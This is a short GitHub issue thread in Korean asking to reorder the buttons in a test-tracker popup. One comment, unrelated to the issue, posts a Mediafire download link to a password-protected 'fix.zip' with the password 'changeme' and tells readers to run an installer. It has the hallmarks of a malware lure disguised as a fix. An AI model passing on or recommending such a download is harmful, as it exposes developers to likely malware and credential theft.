### ISSUE TITLE
[REFACT] 테스트트래커 팝업 버튼 순서 변경

### ISSUE THREAD

**Issue by i-mymeminn** [SIT-Lab/sitlab-test-tracker#11]
## Background
- 팝업의 일관성을 위하여 버튼 순서 조정이 필요함

## To do
- [ ] 팝업의 버튼을 종료버튼 세개, 중지 순으로 변경 100%로 수정

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
